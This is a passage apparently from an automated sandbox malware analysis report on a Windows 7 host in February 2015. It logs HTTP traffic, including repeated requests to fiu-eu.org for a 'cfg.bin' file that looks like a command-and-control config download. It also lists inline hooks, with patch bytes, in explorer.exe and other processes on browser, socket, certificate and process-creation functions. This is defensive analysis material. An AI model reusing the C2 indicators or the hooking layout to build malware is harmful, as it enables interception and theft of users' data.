Feb 5, 2015 14:56:09.249943972 CET	80	49191	80.239.247.17	192.168.2.151	HTTP/1.1 200 OK Content-Type: application/pkix-crl Last-Modified: Sun, 21 Dec 2014 06:03:02 GMT Accept-Ranges: bytes ETag: "d2e35dc7e31cd01:0" Server: Microsoft-IIS/8.5 VTag: 791510855400000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Content-Length: 561 Cache-Control: max-age=900 Date: Thu, 05 Feb 2015 13:55:11 GMT Connection: keep-alive Data Raw: 30 82 02 2d 30 82 01 15 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 81 81 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 Data Ascii: 0-00*H010UUS10	76
Feb 5, 2015 14:56:09.494509935 CET	80	49191	80.239.247.17	192.168.2.151	Data Raw: 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2b 30 29 06 03 55 04 03 13 22 4d 69 63 Data Ascii: UWashington10URedmond10UMicrosoft Corporation1+0)U"Microsoft Windows Verification PCA141220223154Z150321105154Z_0]0U#0p<J0+70U30+7150320224154Z0	77
Feb 5, 2015 14:56:14.438479900 CET	49192	80	192.168.2.151	23.2.52.54	GET /pki/crl/products/WinPCA.crl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: www.microsoft.com	78
Feb 5, 2015 14:56:14.664921999 CET	80	49192	23.2.52.54	192.168.2.151	HTTP/1.1 200 OK Content-Type: application/pkix-crl Last-Modified: Sun, 21 Dec 2014 06:03:02 GMT Accept-Ranges: bytes ETag: "d2e35dc7e31cd01:0" Server: Microsoft-IIS/8.0 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" VTag: 279468358100000000 X-Powered-By: ASP.NET X-Powered-By: ARR/2.5 X-Powered-By: ASP.NET Content-Length: 561 Cache-Control: max-age=373 Date: Thu, 05 Feb 2015 13:55:17 GMT Connection: keep-alive Data Raw: Data Ascii:	78
Feb 5, 2015 14:56:14.898488998 CET	80	49192	23.2.52.54	192.168.2.151	Data Raw: 2d 43 43 43 3a 20 49 54 0d 0a 58 2d 43 49 44 3a 20 32 0d 0a 0d 0a 30 82 02 2d 30 82 01 15 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 81 81 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 Data Ascii: -CCC: ITX-CID: 20-00*H010UUS10UWashington10URedmond10UMicrosoft Corporation1+0)U"Microsoft Windows Verification PCA141220223154Z150321105154Z_0]0U#0p	79
Feb 5, 2015 14:56:23.894489050 CET	49193	80	192.168.2.151	134.170.184.137	GET /fwlink/?LinkId=182227 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: WATClient Host: go.microsoft.com	80
Feb 5, 2015 14:56:24.369798899 CET	80	49193	134.170.184.137	192.168.2.151	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Thu, 05 Feb 2015 13:54:26 GMT Location: https://validation.sls.microsoft.com/SLWGA/WatAdminTemplate.dll Server: Microsoft-IIS/8.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 05 Feb 2015 13:55:26 GMT Content-Length: 180 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 61 6c 69 64 61 74 69 6f 6e 2e 73 6c 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 53 4c 57 47 41 2f 57 61 74 41 64 6d 69 6e 54 65 6d 70 6c 61 74 65 2e 64 6c 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://validation.sls.microsoft.com/SLWGA/WatAdminTemplate.dll">here</a>.</h	81
Feb 5, 2015 14:56:24.602492094 CET	80	49193	134.170.184.137	192.168.2.151	Data Raw: 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2></body></html>	81
Feb 5, 2015 14:57:05.062690020 CET	49193	80	192.168.2.151	134.170.184.137	POST /fwlink/?LinkId=151642 HTTP/1.1 Connection: Keep-Alive Accept: text/* User-Agent: SLSSoapClient Content-Length: 0 Host: go.microsoft.com	89
Feb 5, 2015 14:57:05.344197989 CET	80	49193	134.170.184.137	192.168.2.151	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Thu, 05 Feb 2015 13:55:07 GMT Location: https://validation.sls.microsoft.com/SLWGA/slwga.asmx Server: Microsoft-IIS/8.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 05 Feb 2015 13:56:06 GMT Content-Length: 170 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 61 6c 69 64 61 74 69 6f 6e 2e 73 6c 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 53 4c 57 47 41 2f 73 6c 77 67 61 2e 61 73 6d 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://validation.sls.microsoft.com/SLWGA/slwga.asmx">here</a>.</h2></body></html>	90
Feb 5, 2015 14:57:16.307493925 CET	49193	80	192.168.2.151	134.170.184.137	POST /fwlink/?LinkId=151642 HTTP/1.1 Connection: Keep-Alive Accept: text/* User-Agent: SLSSoapClient Content-Length: 0 Host: go.microsoft.com	110
Feb 5, 2015 14:57:16.576180935 CET	80	49193	134.170.184.137	192.168.2.151	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Thu, 05 Feb 2015 13:55:19 GMT Location: https://validation.sls.microsoft.com/SLWGA/slwga.asmx Server: Microsoft-IIS/8.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 05 Feb 2015 13:56:18 GMT Content-Length: 170 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 61 6c 69 64 61 74 69 6f 6e 2e 73 6c 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 53 4c 57 47 41 2f 73 6c 77 67 61 2e 61 73 6d 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://validation.sls.microsoft.com/SLWGA/slwga.asmx">here</a>.</h2></body></html>	111
Feb 5, 2015 14:57:16.790643930 CET	49195	80	192.168.2.151	78.47.223.171	GET /3/serverphp/cfg.bin HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) Host: fiu-eu.org Cache-Control: no-cache	133
Feb 5, 2015 14:57:27.789047003 CET	49196	80	192.168.2.151	80.239.149.10	GET /pki/crl/products/CodeSignPCA.crl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.microsoft.com	139
Feb 5, 2015 14:57:28.000060081 CET	80	49196	80.239.149.10	192.168.2.151	HTTP/1.1 200 OK Content-Type: application/pkix-crl Last-Modified: Mon, 16 Apr 2012 23:49:48 GMT Accept-Ranges: bytes ETag: "0f6669b2b1ccd1:0" Server: Microsoft-IIS/8.5 VTag: 279809656900000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Content-Length: 558 Cache-Control: max-age=900 Date: Thu, 05 Feb 2015 13:56:30 GMT Connection: keep-alive Data Raw: 30 82 02 2a 30 82 01 12 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 81 a6 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 Data Ascii: 000H010UUS10	140
Feb 5, 2015 14:57:28.202878952 CET	80	49196	80.239.149.10	192.168.2.151	Data Raw: 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2b 30 29 06 03 55 04 0b 13 22 43 6f 70 79 Data Ascii: UWashington10URedmond10UMicrosoft Corporation1+0)U"Copyright (c) 2000 Microsoft Corp.1#0!UMicrosoft Code Signing PCA111110211944Z420416234935Z7050U#0%+K]rTS0+70H	140
Feb 5, 2015 14:58:03.027765036 CET	49197	80	192.168.2.151	23.43.139.27	GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c%3D HTTP/1.1 Cache-Control: max-age = 478693 Connection: Keep-Alive Accept: / If-Modified-Since: Sat, 06 Aug 2011 06:28:48 GMT User-Agent: Microsoft-CryptoAPI/6.1 Host: ocsp.verisign.com	141
Feb 5, 2015 14:58:03.168879032 CET	80	49197	23.43.139.27	192.168.2.151	HTTP/1.1 200 OK Server: nginx/1.4.7 Content-Type: application/ocsp-response Content-Length: 1762 content-transfer-encoding: binary Cache-Control: max-age=579106, public, no-transform, must-revalidate Last-Modified: Thu, 5 Feb 2015 06:44:26 GMT Expires: Thu, 12 Feb 2015 06:44:26 GMT Date: Thu, 05 Feb 2015 13:57:05 GMT Connection: keep-alive Data Raw: 30 82 06 de 0a 01 00 a0 82 06 d7 30 82 06 d3 06 09 2b 06 01 05 05 07 30 01 01 04 82 06 c4 30 82 06 c0 30 81 9e a2 16 04 14 3b 4f 7d 61 a4 21 a9 12 75 1e ca 08 61 75 df c1 65 55 4e 70 18 0f 32 30 31 35 30 32 30 35 30 36 34 34 32 36 5a 30 73 30 71 30 49 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 b9 e9 b2 87 02 85 03 f8 ec a5 fb 42 e1 3e 0f 49 c7 24 26 e2 04 14 7f d3 65 a7 c2 dd ec bb f0 30 09 f3 43 39 fa 02 af 33 31 33 02 10 52 00 e5 Data Ascii: 00+000;O}a!uaueUNp20150205064426Z0s0q0I0+B>I$&e0C9313R	142
Feb 5, 2015 14:58:03.198731899 CET	80	49197	23.43.139.27	192.168.2.151	Data Raw: aa 25 56 fc 1a 86 ed 96 c9 d4 4b 33 c7 80 00 18 0f 32 30 31 35 30 32 30 35 30 36 34 34 32 36 5a a0 11 18 0f 32 30 31 35 30 32 31 32 30 36 34 34 32 36 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 8c 78 10 f1 07 0f 8d 79 e8 32 1b Data Ascii: %VK320150205064426Z20150212064426Z0*Hxy217^u.2FO#fTSuNN=g7{OcQQ0nY1H5oWnr<zd_Mv=A?8]qbK-SoLF4p	143
Feb 5, 2015 14:58:03.198900938 CET	80	49197	23.43.139.27	192.168.2.151	Data Raw: 6a 28 88 46 a7 c2 1e 83 93 83 a4 96 48 74 3f 39 bf 3e 5c b8 7c 96 81 e3 58 c0 4e 1d b3 80 d7 73 ce 56 69 0b d1 0e 2b 5f 72 d6 25 88 29 46 99 0b fe ca 9f 47 46 52 9f e1 04 50 f6 dc df e1 da 0b 95 d3 45 30 24 41 fb c6 e7 89 a6 83 81 76 9f e1 73 a7 Data Ascii: j(FHt?9>\\|XNsVi+_r%)FGFRPE0$AvsAx!DEMrN2[.,y\|i=`87@!I 5!b=[/9trE	144
Feb 5, 2015 14:58:27.220581055 CET	49198	80	192.168.2.151	78.47.223.171	GET /3/serverphp/cfg.bin HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) Host: fiu-eu.org Cache-Control: no-cache	144

Hooks - Code Manipulation Behavior

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CallWindowProcA	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
CallWindowProcW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
EndPaint	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetDCEx	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
DefWindowProcW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
DefDlgProcA	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
DefDlgProcW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
DefWindowProcA	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
PeekMessageA	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
PeekMessageW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
RegisterClassW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
RegisterClassA	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
SetCapture	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
DefFrameProcA	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
DefFrameProcW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
RegisterClassExW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
TranslateMessage	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
BeginPaint	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
RegisterClassExA	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetMessagePos	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
ReleaseCapture	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetUpdateRect	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetUpdateRgn	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetCapture	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetMessageA	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetMessageW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetDC	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetClipboardData	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
OpenInputDesktop	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetWindowDC	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
ReleaseDC	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
DefMDIChildProcA	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
DefMDIChildProcW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
GetCursorPos	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
SwitchDesktop	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
SetCursorPos	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
InternetReadFile	INLINE	explorer.exe
HttpSendRequestA	INLINE	explorer.exe
HttpSendRequestW	INLINE	explorer.exe
InternetQueryDataAvailable	INLINE	explorer.exe
InternetReadFileExA	INLINE	explorer.exe
HttpSendRequestExA	INLINE	explorer.exe
HttpQueryInfoA	INLINE	explorer.exe
HttpSendRequestExW	INLINE	explorer.exe
InternetCloseHandle	INLINE	explorer.exe
GetFileAttributesExW	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
PFXImportCertStore	INLINE	explorer.exe, dwm.exe
LdrLoadDll	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
NtCreateUserProcess	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
ZwCreateUserProcess	INLINE	explorer.exe, dwm.exe, taskhost.exe, conhost.exe
closesocket	INLINE	explorer.exe
send	INLINE	explorer.exe
WSASend	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
CallWindowProcA	INLINE	0xE9 0x9F 0xF8 0x8A 0xA4 0x4B
CallWindowProcW	INLINE	0xE9 0x9B 0xB3 0x3A 0xA2 0x2B
EndPaint	INLINE	0xE9 0x93 0x30 0x0D 0xDD 0xDB
GetDCEx	INLINE	0xE9 0x9C 0xCD 0xD1 0x13 0x3B
DefWindowProcW	INLINE	0xE9 0x90 0x0C 0xC7 0x72 0x2B
DefDlgProcA	INLINE	0xE9 0x95 0x52 0x25 0x54 0x4B
DefDlgProcW	INLINE	0xE9 0x98 0x8A 0xA2 0x29 0x9B
DefWindowProcA	INLINE	0xE9 0x9B 0xB9 0x90 0x03 0x3B
PeekMessageA	INLINE	0xE9 0x97 0x7D 0xD8 0x8C 0xCB
PeekMessageW	INLINE	0xE9 0x94 0x4F 0xF2 0x29 0x9B
RegisterClassW	INLINE	0xE9 0x94 0x40 0x0B 0xBF 0xFB
RegisterClassA	INLINE	0xE9 0x98 0x83 0x30 0x05 0x5B
SetCapture	INLINE	0xE9 0x94 0x41 0x14 0x4E 0xEB
DefFrameProcA	INLINE	0xE9 0x91 0x1D 0xDA 0xA7 0x7B
DefFrameProcW	INLINE	0xE9 0x9A 0xA3 0x3A 0xA8 0x8B
RegisterClassExW	INLINE	0xE9 0x9C 0xCA 0xAC 0xC6 0x6B
TranslateMessage	INLINE	0xE9 0x9E 0xE8 0x81 0x1D 0xDB
BeginPaint	INLINE	0xE9 0x9A 0xAC 0xCD 0xDC 0xCB
RegisterClassExA	INLINE	0xE9 0x94 0x4F 0xF8 0x87 0x7B
GetMessagePos	INLINE	0xE9 0x93 0x30 0x05 0x51 0x1B
ReleaseCapture	INLINE	0xE9 0x92 0x27 0x7F 0xF5 0x5B
GetUpdateRect	INLINE	0xE9 0x99 0x97 0x79 0x97 0x7B
GetUpdateRgn	INLINE	0xE9 0x91 0x1B 0xB1 0x1A 0xAB
GetCapture	INLINE	0xE9 0x96 0x62 0x2F 0xFE 0xEB
GetMessageA	INLINE	0xE9 0x96 0x6D 0xD9 0x92 0x2B
GetMessageW	INLINE	0xE9 0x91 0x1D 0xD2 0x2B 0xBB
GetDC	INLINE	0xE9 0x9F 0xFD 0xDE 0xE8 0x8B
GetClipboardData	INLINE	0xE9 0x91 0x16 0x66 0x65 0x5B
OpenInputDesktop	INLINE	0xE9 0x98 0x8F 0xF8 0x88 0x8B
GetWindowDC	INLINE	0xE9 0x99 0x93 0x3F 0xF0 0x0B
ReleaseDC	INLINE	0xE9 0x96 0x67 0x7E 0xE9 0x9B
DefMDIChildProcA	INLINE	0xE9 0x90 0x0E 0xEB 0xB2 0x2B
DefMDIChildProcW	INLINE	0xE9 0x98 0x87 0x7A 0xAA 0xAB
GetCursorPos	INLINE	0xE9 0x94 0x4F 0xFF 0xF7 0x7B
SwitchDesktop	INLINE	0xE9 0x94 0x4C 0xCC 0xCC 0xCB
SetCursorPos	INLINE	0xE9 0x95 0x56 0x6F 0xF7 0x7B

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
InternetReadFile	INLINE	0xE9 0x99 0x90 0x0C 0xC8 0x8D
HttpSendRequestA	INLINE	0xE9 0x9B 0xB1 0x1A 0xA3 0x3C
HttpSendRequestW	INLINE	0xE9 0x91 0x1E 0xEB 0xBA 0xAD
InternetQueryDataAvailable	INLINE	0xE9 0x9B 0xB2 0x26 0x69 0x9D
InternetReadFileExA	INLINE	0xE9 0x91 0x1A 0xA9 0x98 0x8D
HttpSendRequestExA	INLINE	0xE9 0x98 0x87 0x7A 0xA5 0x5C
HttpQueryInfoA	INLINE	0xE9 0x9E 0xE7 0x7D 0xDF 0xFD
HttpSendRequestExW	INLINE	0xE9 0x93 0x35 0x51 0x1B 0xBD
InternetCloseHandle	INLINE	0xE9 0x97 0x73 0x3E 0xE2 0x2D

Process: explorer.exe, Module: kernel32.dll

Function Name	Hook Type	New Data
GetFileAttributesExW	INLINE	0xE9 0x92 0x27 0x76 0x67 0x7F

Process: explorer.exe, Module: CRYPT32.dll

Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xE9 0x9E 0xE6 0x6C 0xC8 0x87

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
LdrLoadDll	INLINE	0xE9 0x91 0x10 0x0D 0xD0 0x09
NtCreateUserProcess	INLINE	0xE9 0x97 0x76 0x67 0x7A 0xA9
ZwCreateUserProcess	INLINE	0xE9 0x97 0x76 0x67 0x7A 0xA9

Process: explorer.exe, Module: WS2_32.dll

Function Name	Hook Type	New Data
closesocket	INLINE	0xE9 0x92 0x2E 0xE1 0x17 0x78
send	INLINE	0xE9 0x98 0x8B 0xB8 0x8E 0xE8
WSASend	INLINE	0xE9 0x9C 0xCD 0xDE 0xEA 0xA8

Process: dwm.exe, Module: USER32.dll

Function Name	Hook Type	New Data
CallWindowProcA	INLINE	0xE9 0x9F 0xF8 0x8A 0xA4 0x46
CallWindowProcW	INLINE	0xE9 0x9B 0xB3 0x3A 0xA2 0x26
EndPaint	INLINE	0xE9 0x93 0x30 0x0D 0xDD 0xD6
GetDCEx	INLINE	0xE9 0x9C 0xCD 0xD1 0x13 0x36
DefWindowProcW	INLINE	0xE9 0x90 0x0C 0xC7 0x72 0x26
DefDlgProcA	INLINE	0xE9 0x95 0x52 0x25 0x54 0x46
DefDlgProcW	INLINE	0xE9 0x98 0x8A 0xA2 0x29 0x96
DefWindowProcA	INLINE	0xE9 0x9B 0xB9 0x90 0x03 0x36
PeekMessageA	INLINE	0xE9 0x97 0x7D 0xD8 0x8C 0xC6
PeekMessageW	INLINE	0xE9 0x94 0x4F 0xF2 0x29 0x96
RegisterClassW	INLINE	0xE9 0x94 0x40 0x0B 0xBF 0xF6
RegisterClassA	INLINE	0xE9 0x98 0x83 0x30 0x05 0x56
SetCapture	INLINE	0xE9 0x94 0x41 0x14 0x4E 0xE6
DefFrameProcA	INLINE	0xE9 0x91 0x1D 0xDA 0xA7 0x76
DefFrameProcW	INLINE	0xE9 0x9A 0xA3 0x3A 0xA8 0x86
RegisterClassExW	INLINE	0xE9 0x9C 0xCA 0xAC 0xC6 0x66
TranslateMessage	INLINE	0xE9 0x9E 0xE8 0x81 0x1D 0xD6
BeginPaint	INLINE	0xE9 0x9A 0xAC 0xCD 0xDC 0xC6
RegisterClassExA	INLINE	0xE9 0x94 0x4F 0xF8 0x87 0x76
GetMessagePos	INLINE	0xE9 0x93 0x30 0x05 0x51 0x16
ReleaseCapture	INLINE	0xE9 0x92 0x27 0x7F 0xF5 0x56
GetUpdateRect	INLINE	0xE9 0x99 0x97 0x79 0x97 0x76
GetUpdateRgn	INLINE	0xE9 0x91 0x1B 0xB1 0x1A 0xA6
GetCapture	INLINE	0xE9 0x96 0x62 0x2F 0xFE 0xE6
GetMessageA	INLINE	0xE9 0x96 0x6D 0xD9 0x92 0x26
GetMessageW	INLINE	0xE9 0x91 0x1D 0xD2 0x2B 0xB6
GetDC	INLINE	0xE9 0x9F 0xFD 0xDE 0xE8 0x86
GetClipboardData	INLINE	0xE9 0x91 0x16 0x66 0x65 0x56
OpenInputDesktop	INLINE	0xE9 0x98 0x8F 0xF8 0x88 0x86
GetWindowDC	INLINE	0xE9 0x99 0x93 0x3F 0xF0 0x06
ReleaseDC	INLINE	0xE9 0x96 0x67 0x7E 0xE9 0x96
DefMDIChildProcA	INLINE	0xE9 0x90 0x0E 0xEB 0xB2 0x26
DefMDIChildProcW	INLINE	0xE9 0x98 0x87 0x7A 0xAA 0xA6
GetCursorPos	INLINE	0xE9 0x94 0x4F 0xFF 0xF7 0x76
SwitchDesktop	INLINE	0xE9 0x94 0x4C 0xCC 0xCC 0xC6
SetCursorPos	INLINE	0xE9 0x95 0x56 0x6F 0xF7 0x76

Process: dwm.exe, Module: CRYPT32.dll

Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xE9 0x9E 0xE6 0x6C 0xC8 0x82

Process: dwm.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
LdrLoadDll	INLINE	0xE9 0x91 0x10 0x0D 0xD0 0x04
NtCreateUserProcess	INLINE	0xE9 0x97 0x76 0x67 0x7A 0xA4
ZwCreateUserProcess	INLINE	0xE9 0x97 0x76 0x67 0x7A 0xA4

Process: dwm.exe, Module: kernel32.dll

Function Name	Hook Type	New Data
GetFileAttributesExW	INLINE	0xE9 0x92 0x27 0x76 0x67 0x79

Process: taskhost.exe, Module: USER32.dll

Function Name	Hook Type	New Data
CallWindowProcA	INLINE	0xE9 0x9F 0xF8 0x8A 0xA4 0x41
CallWindowProcW	INLINE	0xE9 0x9B 0xB3 0x3A 0xA2 0x21
EndPaint	INLINE	0xE9 0x93 0x30 0x0D 0xDD 0xD1
GetDCEx	INLINE	0xE9 0x9C 0xCD 0xD1 0x13 0x31
DefWindowProcW	INLINE	0xE9 0x90 0x0C 0xC7 0x72 0x21
DefDlgProcA	INLINE	0xE9 0x95 0x52 0x25 0x54 0x41
DefDlgProcW	INLINE	0xE9 0x98 0x8A 0xA2 0x29 0x91
DefWindowProcA	INLINE	0xE9 0x9B 0xB9 0x90 0x03 0x31
PeekMessageA	INLINE	0xE9 0x97 0x7D 0xD8 0x8C 0xC1
PeekMessageW	INLINE	0xE9 0x94 0x4F 0xF2 0x29 0x91
RegisterClassW	INLINE	0xE9 0x94 0x40 0x0B 0xBF 0xF1
RegisterClassA	INLINE	0xE9 0x98 0x83 0x30 0x05 0x51
SetCapture	INLINE	0xE9 0x94 0x41 0x14 0x4E 0xE1
DefFrameProcA	INLINE	0xE9 0x91 0x1D 0xDA 0xA7 0x71
DefFrameProcW	INLINE	0xE9 0x9A 0xA3 0x3A 0xA8 0x81
RegisterClassExW	INLINE	0xE9 0x9C 0xCA 0xAC 0xC6 0x61
TranslateMessage	INLINE	0xE9 0x9E 0xE8 0x81 0x1D 0xD1
BeginPaint	INLINE	0xE9 0x9A 0xAC 0xCD 0xDC 0xC1
RegisterClassExA	INLINE	0xE9 0x94 0x4F 0xF8 0x87 0x71
GetMessagePos	INLINE	0xE9 0x93 0x30 0x05 0x51 0x11
ReleaseCapture	INLINE	0xE9 0x92 0x27 0x7F 0xF5 0x51
GetUpdateRect	INLINE	0xE9 0x99 0x97 0x79 0x97 0x71
GetUpdateRgn	INLINE	0xE9 0x91 0x1B 0xB1 0x1A 0xA1
GetCapture	INLINE	0xE9 0x96 0x62 0x2F 0xFE 0xE1
GetMessageA	INLINE	0xE9 0x96 0x6D 0xD9 0x92 0x21
GetMessageW	INLINE	0xE9 0x91 0x1D 0xD2 0x2B 0xB1
GetDC	INLINE	0xE9 0x9F 0xFD 0xDE 0xE8 0x81
GetClipboardData	INLINE	0xE9 0x91 0x16 0x66 0x65 0x51
OpenInputDesktop	INLINE	0xE9 0x98 0x8F 0xF8 0x88 0x81
GetWindowDC	INLINE	0xE9 0x99 0x93 0x3F 0xF0 0x01
ReleaseDC	INLINE	0xE9 0x96 0x67 0x7E 0xE9 0x91
DefMDIChildProcA	INLINE	0xE9 0x90 0x0E 0xEB 0xB2 0x21
DefMDIChildProcW	INLINE	0xE9 0x98 0x87 0x7A 0xAA 0xA1
GetCursorPos	INLINE	0xE9 0x94 0x4F 0xFF 0xF7 0x71
SwitchDesktop	INLINE	0xE9 0x94 0x4C 0xCC 0xCC 0xC1
SetCursorPos	INLINE	0xE9 0x95 0x56 0x6F 0xF7 0x71

Process: taskhost.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
LdrLoadDll	INLINE	0xE9 0x91 0x10 0x0D 0xD0 0x00
